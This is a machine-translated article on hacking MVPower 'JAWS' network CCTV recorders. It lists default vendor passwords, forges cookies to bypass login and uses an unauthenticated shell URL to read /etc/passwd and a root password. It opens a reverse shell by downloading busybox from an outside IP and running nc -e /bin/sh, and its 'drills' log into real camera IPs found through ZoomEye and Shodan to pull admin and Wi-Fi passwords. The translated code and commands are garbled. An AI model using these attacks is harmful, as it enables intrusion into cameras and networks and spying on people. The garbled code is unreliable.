Popularization and Application of Zoomeye penetration Network Camera

Popularization and Application of Zoomeye penetration Network Camera

Network CAMERAS (ip cameras) are becoming more and more popular in daily life. License plate numbers are captured at intersections, and kindergartens are used to monitor children and community License Plate Recognition Systems, these cameras are connected to computers, videos, and other hardware devices for Image Storage and timely browsing. Many cameras are also directly connected to the network to facilitate connection management and viewing through browsers or clients. The intention of a merchant is to make it easier for users to view the video. However, many network cameras do not pay enough attention to security. Hackers can easily access and browse the network cameras with vulnerabilities through technical means, in some cases, you can also obtain the permissions of the server where the Network Camera is located, or even penetrate into the network where the camera is located, which is very harmful.
1. Vulnerability Analysis
AndrewTierney posted an article on the use of camera vulnerabilities (https://www.pentestpartners.com/blog/pwning-cctv-cameras/) on his Blog ). The core is summarized as follows:
1. Weak Password Vulnerability
For short, "CCTV" (Mvpower 8 Channel Security DVR Full D1 H.264 CCTV Real-time Network Digital Video Recorder Mobile Motion Detection, P2P HDMIAlarm Email for CCTV Surveillance Cmeras System) amazon purchase address region. The passwords of the other network cameras collected are as follows:
(1) hikvision IP Network Camera: Super User: admin, Super User Password: 12345.
(2) Dahua Network Camera: User name: admin and password: 888888.
(3) tiandiweiye Network Camera: User name: Admin, password: 111111
2. logon password Bypass Vulnerability
We can capture packets on the pages successfully logged on with the default password, find the js that processes the logon logic on the page, and analyze the logic of Logon on the page. The logon bypass vulnerability exists. The Code is as follows:
$ (Document). ready (function (){
Dvr_camcnt = Cookies. get ("dvr_camcnt ");
ISetAble = Cookies. get ("iSetAble ");
IPlayBack = Cookies. get ("iPlayBack ");
Dvr_usr = Cookies. get ("dvr_usr ");
Dvr_pwd = Cookies. get ("dvr_pwd ");
If (iSetAble = '0 '){
Certificate ('{pb_settings'{.css ('display', 'None ');
}
If (iPlayBack = '0 '){
Certificate ('{pb_review'}.css ('display', 'None ');
}
If (dvr_camcnt = null | dvr_usr = null | dvr_pwd = null)
{
Location. href = "/index.html ";
}
The System Management page directly checks whether the cookie is empty through js to determine whether the user is logged on. Now there are programmers who write the logon status to judge.
Therefore, you can bypass the logon check by forging a cookie. The Code shows that three cookie values need to be forged: dvr_camcnt, dvr_usr = admin, dvr_pwd = 123. Open volume directly. Dvr_usr and dvr_pwd can be set at will, as long as they are not empty, as shown in 1. After saving the file, refresh http://xx.xx.xx.xx/view2.html to successfully renew the system.

Figure 1 Password Bypass Vulnerability
3. directly obtain the webshell and Its root Password
Direct access to http://www.antian365.com/shell? Cat/etc/passwd to get the root account password of the server, as shown in figure 2. Obtain the password of the root account a03e3thxwWU0g. The plaintext is "juantech ".

Figure 2 obtain webshell
4. Obtain the reverse shell
Run the following command:
Cd/root/rec/a1 & wget http: // 212.111.43.161/busybox & chmod + xbusybox &&. /busybox nc 122.115.47.398000-e/bin/sh, the shell will be rebounded to port 8000 of 122.115.47.39. You can also execute the command "http://www.antian365.com/shell? /Usr/sbin/telnetd-l/bin/sh-p 25 "directly enters the system through telnet to the target IP address.
Ii. Practical drills
Through the vulnerability analysis above, we can test the actual vulnerability of the CCTV network camera with the vulnerability to verify the authenticity of the vulnerability and master the vulnerability utilization method.
1. Determine the cctv Network Camera keyword "JAWS"
Enable bannergrab in kaliLinux, fill in the IP address and web port number of the device, and banner crawls result 3. the keyword is the Server String "JAWS ".

Figure 3 obtain keywords
2. quickly obtain the target server
In this example, use zoomeye for retrieval and enter the address https://www.zoomeye.org/search? Q = JAWS direct query, you can also use shodan for retrieval (https://www.shodan.io/search? Query = JAWS % 2F1. 0), 4 shows that about 37,726 results are found, and 34,263 hosts (0.096 seconds) are obtained ).

Figure 4 search for the keyword "JAWS"
3. Random Access to the target
Access the results randomly in the search results. Open http: // 223.20.146.74/, enter the admin password as the user name, and log on to the system directly, as shown in Figure 5. You can view the monitored room and screen.

Figure 5 Access Permissions
4. directly obtain the access password
Use the command "shell? Cat % 20/tmp/usrm. ini "can be used to directly obtain the access password, for example, http: // 210.21.34.206/shell? Cat % 20/tmp/usrm. ini. The default administrator password is blank, as shown in Figure 6 and Figure 7. After you modify the default password, access it again. The password has been written to the/tmp/usrm. ini file.

Figure 6 getting the Administrator Password

Figure 7 Save the modified password in plaintext
5. Get the wireless network password
You can directly obtain the Wireless AP name and password in the network settings, as shown in figure 8.

6. Reverse shell Testing
A reverse shell test has been performed on some targets. All of the tests are successful and may not have the write permission. It takes about 100 MB to download the http: // 212.111.43.161/busybox file.
Iii. Preventive measures and suggestions
Currently, malicious programs have been exploited on the Internet, but no patches have been released. You can take the following measures to reinforce security:
1. Change the default root password to another strong password.
2. External access is not provided. You can also set the address to a complex name so that its default address is not accessed.
3. strictly restrict server writability.
4. Change the default admin password.